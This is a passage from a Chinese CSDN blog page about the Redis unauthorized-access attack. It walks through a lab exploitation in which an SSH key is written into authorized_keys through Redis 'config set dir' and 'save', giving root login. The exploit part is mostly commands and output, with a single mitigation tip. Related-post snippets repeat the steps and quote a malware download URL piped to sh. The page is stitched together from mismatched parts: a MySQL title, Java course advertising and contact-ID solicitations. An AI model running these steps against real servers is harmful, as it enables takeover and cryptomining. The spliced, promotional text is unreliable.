卧槽一文搞懂 Redis 挖矿原理及如何防范,2024年最新MySQL优化原理分析及优化方案总结

于 2024-04-10 09:24:54 发布
阅读量827 收藏 17
点赞数 22
分类专栏: 2024年程序员学习 文章标签: redis mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84104966/article/details/137581651
版权
文章讲述了如何通过Redis的配置更改实现远程主机提权,以及针对此漏洞的防范措施。作者还分享了Java开发者的学习资源和提升建议。
摘要由CSDN通过智能技术生成

OK

登录Redis进行检查,是否已经写入进Redis中。

root@kali:/tmp/rediskey# redis-cli -h 192.168.243.129

192.168.243.129:6379> get bar

“\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali\n\n\n\n”

  • 2.3 通过Redis保存机制替换系统文件

且看如下操作

192.168.243.129:6379> config set dir /root/.ssh

OK

192.168.243.129:6379> config get dir

1) “dir”

2) “/root/.ssh”

192.168.243.129:6379> config set dbfilename “authorized_keys”

OK

192.168.243.129:6379> save

OK

192.168.243.129:6379> exit

这个时候,我们登录远程主机看下效果。

root@kali:/tmp/rediskey# ssh -i id_rsa root@192.168.243.129

The authenticity of host ‘192.168.243.129 (192.168.243.129)’ can’t be established.

ECDSA key fingerprint is SHA256:XTnAL+b8HB5FL/t3ZlZqt0EfmTBgj7TI5VBU0nSHSGU.

Are you sure you want to continue connecting (yes/no)? yes

Warning: Permanently added ‘192.168.243.129’ (ECDSA) to the list of known hosts.

Linux kali 4.19.0-kali3-amd64 #1 SMP Debian 4.19.20-1kali1 (2019-02-14) x86_64

Last login: Sun Apr 14 20:52:40 2019 from 192.168.243.1

root@kali:~#

OK,到这里我们已经提权成功了,那我们看下导出文件到底是什么呢?其实就是Redis的保存文件形式罢了,有兴趣可以自己打开看看,这里不再展示。

3、如何预防

这个漏洞威力还是挺大的,我们现在只是拿到主机权限一个而已,加入放到定时任务执行一些脚本然后在批量感染呢?

防范的技巧如下:

  • Redis不要监听在危险IP上,如果有请加防火墙控制;

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数Java工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则几千的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年Java开发全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上Java开发知识点,真正体系化!

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以添加V获取:vip1024b (备注Java)
img

最后

这份《“java高分面试指南”-25分类227页1000+题50w+字解析》同样可分享给有需要的朋友,感兴趣的伙伴们可挑战一下自我,在不看答案解析的情况,测试测试自己的解题水平,这样也能达到事半功倍的效果!(好东西要大家一起看才香)

image

image

一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
img

人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
[外链图片转存中…(img-oQ4vakOt-1712712283999)]

2401_84104966
关注
  • 22
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
由于redis暴露外网未设置密码被挖矿问题处理
ZhengXinMing1998的博客
05-24 879
一、问题查找 接到腾讯云短信提醒,服务器可能被植入了挖矿程序。 1.于是top查看cpu占用,发现一个名为java8_8的程序会定时隔一段时间就占用系统特别高的cpu 2.检查系统中的定时任务 发现/etc/crontab文件中出现了可疑的定时任务,通过ip查找发现ip地址来自美国 3.检查系统启动项,发现启动项中确有java8_8-server,并且状态位enable的 二、问题处理 1.清除系统该进行的启动项:systemctl disable 服务名 2.查看进程的存储目录,rm -rf /
Redis未授权漏洞复现,利用其实现的挖矿蠕虫脚本分析
qq_53689523的博客
05-05 826
Redis未授权漏洞复现 挖矿蠕虫脚本分析 恶意代码分析实例
记一次阿里云服务器因Redis被【挖矿病毒crypto和pnscan】攻击的case,附带解决方案
最新发布
ZL_1618的博客
12-27 1163
因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。④ CTF大赛、web安全、渗透测试方面的视频(适合小白学习)①1000+CTF历届题库(主流和经典的应该都有了)③项目源码(四五十个有趣且经典的练手项目及源码)⑦ 2023密码学/隐身术/PWN技术手册大全。⑤ 网络安全学习路线图(告别不入流的学习)⑥ CTF/渗透测试工具镜像文件大全。②CTF技术文档(最全中文版)
CPU被挖矿Redis竟是内鬼
m0_67900727的博客
03-17 193
却说这一日,Redis正如往常一般工作,不久便收到了一条SAVE命令。 虽说这Redis常被用来当做缓存,数据只存在于内存中,却也能通过SAVE命令将内存中的数据保存到磁盘文件中以便持久化存储。 图片 只见Redis刚打开文件,准备写入,不知何处突然冲出几个大汉将其擒住。 到底是怎么回事?Redis一脸懵。 这事还得要从一个月之前说起。 挖矿病毒 前情回顾:CPU深夜狂飙,一帮大佬都傻眼了··· 一个月前,突如其来的警报声打破了Linux帝国夜晚的宁静,CPU占用率突然飙升,却不知
redis不加密,导致服务器被黑,执行挖矿程序
Shine_mmm
04-13 529
做到以下这几点,可保证Redis安全 启动:不能以root用户来启动!!! 端口:避免用默认6379端口 地址:避免仅监听本地地址 密码:密码设置复杂一点 redis-cli登录时不要通过redis-cli -a YouPassword来登录,而是先登录后验证,redis-cli后,输入auth YouPassword的方式 限制Redis的文件目录访问权限 设置redis的主目录权限为700...
Redis架构原理及应用实践
01-27
Redis是完全开源免费的,是一个高性能的key-value类型的内存数据库。整个数据库统统加载在内存当中进行操作,定期通过异步操作把数据库数据flush到硬盘上进行保存。因为是纯内存操作,Redis的性能非常出色,每秒可以...
Redis原理及使用
01-27
(1)什么是redis?Redis是一个基于内存的高性能key-value数据库。(有空再补充,有理解错误或不足欢迎指正) (2)Reids的特点Redis本质上是一个Key-Value类型的内存数据库,很像memcached,整个数据库统统加载在内存...
深入学习Redis高可用架构:哨兵原理及实践
02-25
本文将要介绍的哨兵,它基于Redis主从复制,主要作用便是解决主节点故障恢复的自动化问题,进一步提高系统的高可用性。(注:文章内容基于Redis3.0版本)在介绍哨兵之前,首先从宏观角度回顾一下Redis实现高可用相关...
外网安装redis操作不规范导致服务器被挖矿,无奈之下重装
Irons_one的博客
01-03 890
云服务器安装jdk,tomcat,mysql,redis 推荐使用一个工具:MobaXterm,一个上传文件和远程连接操作一体的软件 1. 安装JDK 用MobaXterm工具将jdk压缩包上传至服务器的一个文件夹中 解压 tar -xvf jdk-8u251-linux-x64.tar.gz -C /usr/java 配置环境变量:查看当前jdk路径 vi /etc/profile 配置完成保存退出 重新编译配置文件 source /etc/profile javac命令查看jdk环境是否配
Linux挖矿病毒排查(通过redis入侵服务器原理)
程序员阿飘 的博客
01-11 1272
3.将公钥写入目标机器的authorized_keys 文件* cat foo | redis-cli -h 12.34.56.78 -x set crackit* redis-cli -h 12.34.56.78* config set dir /root/.ssh/* config get dir* config set dbfilename "authorized_keys"执行程序在/tmp下2.find / -name qW3xT.4, find / -name ddgs.3016;
排查通过服务器中 redis漏洞植入 pnscan 病毒进行挖矿
pkyShare 的博客
05-17 815
1 描述   最近买了一台云服务器进行学习研究,然后装了 redis,怎想到了某天晚上 22:00 开始服务器就卡顿了,输入命令半天没响应,然后重新连接则多次超时。最后连接上去了,输入命令 uptime ,显示如下图:   我的服务器是 1 核心的,信息显示有另一个用户,而且后面三个参数都超过了 1,表示当前 CPU 严重过载。   再在云服务器管理页面查看可视化界面,如下图:   没遇到过这种情况,然后就提交了工单叫云服务器人员帮忙处理。 2 结果与分析   结果是攻击者通过 redis 的安全漏洞植入
阿里云服务器被Redis弱密码漏洞挖矿
清风思雨的博客
08-11 404
重启了三次,没办法,最后是通过重装了系统才解决的,就短短的半个小时,就被渗透,这速度。总之损失了很多文件,配置,数据库也没有被及时备份,唉,之前被SSH远程攻击上万次都没被打,被redis漏洞半个小时沦陷,长个记性,以后注意!我尝试了网上的极多的解决方案,但是都没用了,这些黑客的手段也是不断更新迭代。定时任务我也改了,删了,再到病毒文件清空了,但是都无所事事,进程杀不死,CPU长时间100%。...
新手使用Redis时,被挖矿组织偷袭
weixin_55166254的博客
10-20 547
本文大概分析了,当你打开Redis访问权限后,系统是如何被一步步入侵的过程,并记录了一下当被入侵后的一些措施,另外我的知识简单的处理,可能病毒仍未清除干净,需要找更专业的文章进行排查
服务器Redis实例中挖矿病毒排查及处理
wejack的专栏
01-20 710
文章系转载,方便整理和归纳,源文地址 https://z.itpub.net/article/detail/E0D0607EFA91E5FA88035F74D040DD26 巧不巧的我的服务器也被挖矿了,应该就是这个方法搞的 却说这一日,Redis正如往常一般工作,不久便收到了一条SAVE命令。 虽说这Redis常被用来当做缓存,数据只存在于内存中,却也能通过SAVE命令将内存中的数据保存到磁盘文件中以便持久化存储。 只见Redis刚打开文件,准备写入,不知何处突然冲出几个大汉将其擒住。 到底是怎么回事.
记一次因为redis漏洞挖矿
啊鹏的博客
10-01 2822
问题:CPU一直100%,top看不到进程,无从下手,阿里云无限报异常文件下载,以及linux共享库预加载配置文件被篡改。 经百度,到解决办法: 参考文档:https://blog.csdn.net/leisure_life/article/details/82899703 https://blog.csdn.net/leisure_life/article/details/82905256...
记一次因redis未授权访问漏洞被攻击进行挖矿
12-05 894
一、问题描述 redis存储的业务数据被清空,且被注入未知的url下载链接: cur -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |sh 百度该链接后,发现是这是一段带有恶意链接脚本,进行恶意shell脚本下载,从而实现远程代码攻击,并进行挖矿行为。 二、分析 分析参考链接: https://www.freebuf.com/c...
记一次redis遭受挖矿脚本攻击
weixin_39177464的博客
01-26 544
攻击前提:redis端口和密码均暴露 步骤: 1:生成一对公私钥,可本地命令行或使用工具生成,例如:ssh-keygen -t rsa 2:将公钥写入到文件里,例如:(echo-e"\n\n";cat id_rsa.pub;echo-e"\n\n")>foo.txt 3:cat命令读取公钥文件内容,并连接redis写入key test中,例如:cat /home/zqw/.ssh/foo.txt | ./redis-cli -h x.x.x.y -x set test 4:利用redis的配
解决redis在linux(centos)下的一个挖矿漏洞
qq_34870166的博客
01-24 5477
redis挖矿漏洞
01 缓存通识与Redis架构原理.pdf
04-23
“01 缓存通识与Redis架构原理.pdf”是一本介绍缓存技术和Redis架构原理的书籍,对于想要深入了解缓存和Redis的人来说,这本书是一个很好的学习资源。缓存技术是高并发场景下提高热点数据访问性能的一个有效手段,而...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值